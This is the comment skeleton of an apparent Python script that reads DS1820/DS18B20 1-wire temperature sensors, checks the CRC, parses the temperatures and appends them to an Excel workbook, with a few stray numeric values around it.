0.648982
#!/usr/bin/env python3 # DS1820 and DS18S20 have the Family Code 10 # DS18B20 has Code 28 # DS1822 the 22. # Don't know will this work with 'B' or x22 -sensors # Remove first comma from path if using with real sensors # Pick only valid sensor-folders, folder starts with correct family code # List of temp-sensors id's # Take list of temp-sensors id's as argument # Parse crc-check, last word in line (YES/NO) # Parse temperature, last word in line followed by 't=' # Save sensor-id and temp to dictionary # Dictionary of sensor-id combined with temperature # Create initial excel file, if not exist # One time excel-file initializing # Load excel-workbook and save new data # Read excel headers for sensor-id -name compare # Find last row from data-worksheet # Convert row 'number' [row_headers.index(id)] to letter [id:0 + ascii:97 = A] # Add new temp for sensor-id row # Add new sensor-id and save temp for that row # Get last row [id:0 + ascii:97 = A]
2.690725
3